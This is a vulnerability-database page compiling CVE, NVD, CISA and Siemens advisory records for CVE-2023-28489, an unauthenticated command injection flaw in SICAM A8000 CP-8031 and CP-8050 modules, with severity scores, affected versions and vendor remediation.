Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2023-28489 (GCVE-0-2023-28489)
Vulnerability from cvelistv5 – Published: 2023-04-11 09:03 – Updated: 2025-02-13 16:48
VLAI?
EPSS
Summary
A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter “Remote Operation” is enabled. The parameter is disabled by default.
The vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.
Severity ?
9.8 (Critical)
CWE
- CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')
Assigner
References
Impacted products
| Vendor | Product | Version | |||||||
|---|---|---|---|---|---|---|---|---|---|
| Siemens | CP-8031 MASTER MODULE |
Affected:
All versions < CPCI85 V05
|
|||||||
|
|||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T12:38:25.371Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
},
{
"tags": [
"x_transferred"
],
"url": "http://seclists.org/fulldisclosure/2023/Jul/14"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-28489",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-02-07T16:50:18.504791Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-02-07T16:50:22.779Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "CP-8031 MASTER MODULE",
"vendor": "Siemens",
"versions": [
{
"status": "affected",
"version": "All versions \u003c CPCI85 V05"
}
]
},
{
"defaultStatus": "unknown",
"product": "CP-8050 MASTER MODULE",
"vendor": "Siemens",
"versions": [
{
"status": "affected",
"version": "All versions \u003c CPCI85 V05"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default.\r\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-77",
"description": "CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-11T17:06:25.587Z",
"orgId": "cec7a2ec-15b4-4faf-bd53-b40f371f3a77",
"shortName": "siemens"
},
"references": [
{
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
},
{
"url": "http://seclists.org/fulldisclosure/2023/Jul/14"
},
{
"url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "cec7a2ec-15b4-4faf-bd53-b40f371f3a77",
"assignerShortName": "siemens",
"cveId": "CVE-2023-28489",
"datePublished": "2023-04-11T09:03:04.302Z",
"dateReserved": "2023-03-16T10:14:37.883Z",
"dateUpdated": "2025-02-13T16:48:43.223Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"fkie_nvd": {
"configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:siemens:cp-8031_firmware:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"cpci85_v05\", \"matchCriteriaId\": \"CA401321-A9D1-48B1-A1B3-219AE95C64AB\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:siemens:cp-8031:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"D24F9EDC-DA14-477D-B9C1-C9BF56E9B057\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:siemens:cp-8050_firmware:*:*:*:*:*:*:*:*\", \"versionEndExcluding\": \"cpci85_v05\", \"matchCriteriaId\": \"CE2E15ED-C2B8-4FBD-9B34-8FD0C73FAB8C\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:siemens:cp-8050:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"929EF3DE-C8E6-49DA-98C0-13AB4C966AA7\"}]}]}]",
"descriptions": "[{\"lang\": \"en\", \"value\": \"A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \\u201cRemote Operation\\u201d is enabled. The parameter is disabled by default.\\r\\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.\"}]",
"id": "CVE-2023-28489",
"lastModified": "2024-11-21T07:55:12.923",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"productcert@siemens.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"NONE\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 3.9, \"impactScore\": 5.9}]}",
"published": "2023-04-11T10:15:18.280",
"references": "[{\"url\": \"http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html\", \"source\": \"productcert@siemens.com\"}, {\"url\": \"http://seclists.org/fulldisclosure/2023/Jul/14\", \"source\": \"productcert@siemens.com\"}, {\"url\": \"https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf\", \"source\": \"productcert@siemens.com\", \"tags\": [\"Vendor Advisory\"]}, {\"url\": \"http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://seclists.org/fulldisclosure/2023/Jul/14\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Vendor Advisory\"]}]",
"sourceIdentifier": "productcert@siemens.com",
"vulnStatus": "Modified",
"weaknesses": "[{\"source\": \"productcert@siemens.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-77\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-77\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2023-28489\",\"sourceIdentifier\":\"productcert@siemens.com\",\"published\":\"2023-04-11T10:15:18.280\",\"lastModified\":\"2024-11-21T07:55:12.923\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default.\\r\\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"productcert@siemens.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":9.8,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"NONE\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":3.9,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"productcert@siemens.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-77\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-77\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:siemens:cp-8031_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"cpci85_v05\",\"matchCriteriaId\":\"CA401321-A9D1-48B1-A1B3-219AE95C64AB\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:siemens:cp-8031:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"D24F9EDC-DA14-477D-B9C1-C9BF56E9B057\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:siemens:cp-8050_firmware:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"cpci85_v05\",\"matchCriteriaId\":\"CE2E15ED-C2B8-4FBD-9B34-8FD0C73FAB8C\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:siemens:cp-8050:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"929EF3DE-C8E6-49DA-98C0-13AB4C966AA7\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html\",\"source\":\"productcert@siemens.com\"},{\"url\":\"http://seclists.org/fulldisclosure/2023/Jul/14\",\"source\":\"productcert@siemens.com\"},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf\",\"source\":\"productcert@siemens.com\",\"tags\":[\"Vendor Advisory\"]},{\"url\":\"http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://seclists.org/fulldisclosure/2023/Jul/14\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Vendor Advisory\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf\", \"tags\": [\"x_transferred\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2023/Jul/14\", \"tags\": [\"x_transferred\"]}, {\"url\": \"http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html\", \"tags\": [\"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T12:38:25.371Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-28489\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"none\"}, {\"Automatable\": \"yes\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-02-07T16:50:18.504791Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-02-07T16:50:09.282Z\"}}], \"cna\": {\"metrics\": [{\"cvssV3_1\": {\"version\": \"3.1\", \"baseScore\": 9.8, \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C\"}}], \"affected\": [{\"vendor\": \"Siemens\", \"product\": \"CP-8031 MASTER MODULE\", \"versions\": [{\"status\": \"affected\", \"version\": \"All versions \u003c CPCI85 V05\"}], \"defaultStatus\": \"unknown\"}, {\"vendor\": \"Siemens\", \"product\": \"CP-8050 MASTER MODULE\", \"versions\": [{\"status\": \"affected\", \"version\": \"All versions \u003c CPCI85 V05\"}], \"defaultStatus\": \"unknown\"}], \"references\": [{\"url\": \"https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf\"}, {\"url\": \"http://seclists.org/fulldisclosure/2023/Jul/14\"}, {\"url\": \"http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html\"}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \\u201cRemote Operation\\u201d is enabled. The parameter is disabled by default.\\r\\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-77\", \"description\": \"CWE-77: Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"cec7a2ec-15b4-4faf-bd53-b40f371f3a77\", \"shortName\": \"siemens\", \"dateUpdated\": \"2023-07-11T17:06:25.587Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2023-28489\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-02-13T16:48:43.223Z\", \"dateReserved\": \"2023-03-16T10:14:37.883Z\", \"assignerOrgId\": \"cec7a2ec-15b4-4faf-bd53-b40f371f3a77\", \"datePublished\": \"2023-04-11T09:03:04.302Z\", \"assignerShortName\": \"siemens\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
FKIE_CVE-2023-28489
Vulnerability from fkie_nvd - Published: 2023-04-11 10:15 - Updated: 2024-11-21 07:55
Severity ?
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Summary
A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter “Remote Operation” is enabled. The parameter is disabled by default.
The vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| siemens | cp-8031_firmware | * | |
| siemens | cp-8031 | - | |
| siemens | cp-8050_firmware | * | |
| siemens | cp-8050 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:siemens:cp-8031_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CA401321-A9D1-48B1-A1B3-219AE95C64AB",
"versionEndExcluding": "cpci85_v05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:siemens:cp-8031:-:*:*:*:*:*:*:*",
"matchCriteriaId": "D24F9EDC-DA14-477D-B9C1-C9BF56E9B057",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:siemens:cp-8050_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CE2E15ED-C2B8-4FBD-9B34-8FD0C73FAB8C",
"versionEndExcluding": "cpci85_v05",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:siemens:cp-8050:-:*:*:*:*:*:*:*",
"matchCriteriaId": "929EF3DE-C8E6-49DA-98C0-13AB4C966AA7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability has been identified in CP-8031 MASTER MODULE (All versions \u003c CPCI85 V05), CP-8050 MASTER MODULE (All versions \u003c CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default.\r\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device."
}
],
"id": "CVE-2023-28489",
"lastModified": "2024-11-21T07:55:12.923",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "productcert@siemens.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2023-04-11T10:15:18.280",
"references": [
{
"source": "productcert@siemens.com",
"url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
},
{
"source": "productcert@siemens.com",
"url": "http://seclists.org/fulldisclosure/2023/Jul/14"
},
{
"source": "productcert@siemens.com",
"tags": [
"Vendor Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://packetstormsecurity.com/files/173370/Siemens-A8000-CP-8050-CP-8031-Code-Execution-Command-Injection.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://seclists.org/fulldisclosure/2023/Jul/14"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
}
],
"sourceIdentifier": "productcert@siemens.com",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "productcert@siemens.com",
"type": "Secondary"
},
{
"description": [
{
"lang": "en",
"value": "CWE-77"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
SSA-472454
Vulnerability from csaf_siemens - Published: 2023-04-11 00:00 - Updated: 2023-04-11 00:00Summary
SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices
Notes
Summary
The CPCI85 firmware of SICAM A8000 CP-8031 and CP-8050 is affected by unauthenticated command injection vulnerability. This could allow an attacker to perfom remote code execution.
Siemens has released updates for the affected products and recommends to update to the latest versions.
General Recommendations
Operators of critical power systems (e.g. TSOs or DSOs) worldwide are usually required by regulations to build resilience into the power grids by applying multi-level redundant secondary protection schemes. It is therefore recommended that the operators check whether appropriate resilient protection measures are in place. The risk of cyber incidents impacting the grid's reliability can thus be minimized by virtue of the grid design.
Siemens strongly recommends applying the provided security updates using the corresponding tooling and documented procedures made available with the product. If supported by the product, an automated means to apply the security updates across multiple product instances may be used. Siemens strongly recommends prior validation of any security update before being applied, and supervision by trained staff of the update process in the target environment.
As a general security measure Siemens strongly recommends to protect network access with appropriate mechanisms (e.g. firewalls, segmentation, VPN). It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment.
Recommended security guidelines can be found at:
https://www.siemens.com/gridsecurity
Additional Resources
For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories
Terms of Use
Siemens Security Advisories are subject to the terms and conditions contained in Siemens' underlying license terms or other applicable agreements previously agreed to with Siemens (hereinafter "License Terms"). To the extent applicable to information, software or documentation made available in or through a Siemens Security Advisory, the Terms of Use of Siemens' Global Website (https://www.siemens.com/terms_of_use, hereinafter "Terms of Use"), in particular Sections 8-10 of the Terms of Use, shall apply additionally. In case of conflicts, the License Terms shall prevail over the Terms of Use.
{
"document": {
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Disclosure is not limited. (TLPv2: TLP:CLEAR)",
"tlp": {
"label": "WHITE"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "The CPCI85 firmware of SICAM A8000 CP-8031 and CP-8050 is affected by unauthenticated command injection vulnerability. This could allow an attacker to perfom remote code execution.\n\nSiemens has released updates for the affected products and recommends to update to the latest versions.",
"title": "Summary"
},
{
"category": "general",
"text": "Operators of critical power systems (e.g. TSOs or DSOs) worldwide are usually required by regulations to build resilience into the power grids by applying multi-level redundant secondary protection schemes. It is therefore recommended that the operators check whether appropriate resilient protection measures are in place. The risk of cyber incidents impacting the grid\u0027s reliability can thus be minimized by virtue of the grid design.\nSiemens strongly recommends applying the provided security updates using the corresponding tooling and documented procedures made available with the product. If supported by the product, an automated means to apply the security updates across multiple product instances may be used. Siemens strongly recommends prior validation of any security update before being applied, and supervision by trained staff of the update process in the target environment. \nAs a general security measure Siemens strongly recommends to protect network access with appropriate mechanisms (e.g. firewalls, segmentation, VPN). It is advised to configure the environment according to our operational guidelines in order to run the devices in a protected IT environment.\n\nRecommended security guidelines can be found at:\n\nhttps://www.siemens.com/gridsecurity",
"title": "General Recommendations"
},
{
"category": "general",
"text": "For further inquiries on security vulnerabilities in Siemens products and solutions, please contact the Siemens ProductCERT: https://www.siemens.com/cert/advisories",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "Siemens Security Advisories are subject to the terms and conditions contained in Siemens\u0027 underlying license terms or other applicable agreements previously agreed to with Siemens (hereinafter \"License Terms\"). To the extent applicable to information, software or documentation made available in or through a Siemens Security Advisory, the Terms of Use of Siemens\u0027 Global Website (https://www.siemens.com/terms_of_use, hereinafter \"Terms of Use\"), in particular Sections 8-10 of the Terms of Use, shall apply additionally. In case of conflicts, the License Terms shall prevail over the Terms of Use.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "productcert@siemens.com",
"name": "Siemens ProductCERT",
"namespace": "https://www.siemens.com"
},
"references": [
{
"category": "self",
"summary": "SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices - HTML Version",
"url": "https://cert-portal.siemens.com/productcert/html/ssa-472454.html"
},
{
"category": "self",
"summary": "SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices - CSAF Version",
"url": "https://cert-portal.siemens.com/productcert/csaf/ssa-472454.json"
},
{
"category": "self",
"summary": "SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices - PDF Version",
"url": "https://cert-portal.siemens.com/productcert/pdf/ssa-472454.pdf"
},
{
"category": "self",
"summary": "SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices - TXT Version",
"url": "https://cert-portal.siemens.com/productcert/txt/ssa-472454.txt"
}
],
"title": "SSA-472454: Command Injection Vulnerability in CPCI85 Firmware of SICAM A8000 Devices",
"tracking": {
"current_release_date": "2023-04-11T00:00:00Z",
"generator": {
"engine": {
"name": "Siemens ProductCERT CSAF Generator",
"version": "1"
}
},
"id": "SSA-472454",
"initial_release_date": "2023-04-11T00:00:00Z",
"revision_history": [
{
"date": "2023-04-11T00:00:00Z",
"legacy_version": "1.0",
"number": "1",
"summary": "Publication Date"
}
],
"status": "interim",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version_range",
"name": "vers:all/\u003cCPCI85 V05",
"product": {
"name": "CP-8031 MASTER MODULE (6MF2803-1AA00)",
"product_id": "1",
"product_identification_helper": {
"model_numbers": [
"6MF2803-1AA00"
]
}
}
}
],
"category": "product_name",
"name": "CP-8031 MASTER MODULE (6MF2803-1AA00)"
},
{
"branches": [
{
"category": "product_version_range",
"name": "vers:all/\u003cCPCI85 V05",
"product": {
"name": "CP-8050 MASTER MODULE (6MF2805-0AA00)",
"product_id": "2",
"product_identification_helper": {
"model_numbers": [
"6MF2805-0AA00"
]
}
}
}
],
"category": "product_name",
"name": "CP-8050 MASTER MODULE (6MF2805-0AA00)"
}
],
"category": "vendor",
"name": "Siemens"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2023-28489",
"cwe": {
"id": "CWE-77",
"name": "Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)"
},
"notes": [
{
"category": "summary",
"text": "Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter \u201cRemote Operation\u201d is enabled. The parameter is disabled by default.\r\nThe vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"1",
"2"
]
},
"remediations": [
{
"category": "mitigation",
"details": "Limit access to the web server on port 80/TCP and 443/TCP with an external firewall.",
"product_ids": [
"1",
"2"
]
},
{
"category": "vendor_fix",
"details": "Update to CPCI85 V05 or later version",
"product_ids": [
"1"
],
"url": "https://support.industry.siemens.com/cs/ww/en/view/109804985/"
},
{
"category": "vendor_fix",
"details": "Update to CPCI85 V05 or later version",
"product_ids": [
"2"
],
"url": "https://support.industry.siemens.com/cs/ww/en/view/109804985/"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C",
"version": "3.1"
},
"products": [
"1",
"2"
]
}
],
"title": "CVE-2023-28489"
}
]
}
VAR-202304-0672
Vulnerability from variot - Updated: 2023-12-18 11:20A vulnerability has been identified in CP-8031 MASTER MODULE (All versions < CPCI85 V05), CP-8050 MASTER MODULE (All versions < CPCI85 V05). Affected devices are vulnerable to command injection via the web server port 443/tcp, if the parameter “Remote Operation” is enabled. The parameter is disabled by default. The vulnerability could allow an unauthenticated remote attacker to perform arbitrary code execution on the device. Siemens' cp-8031 firmware and cp-8050 Firmware contains a command injection vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. Siemens SICAM A8000 is a protection and separation control unit for relay protection and substation environment developed by Germany's Siemens.
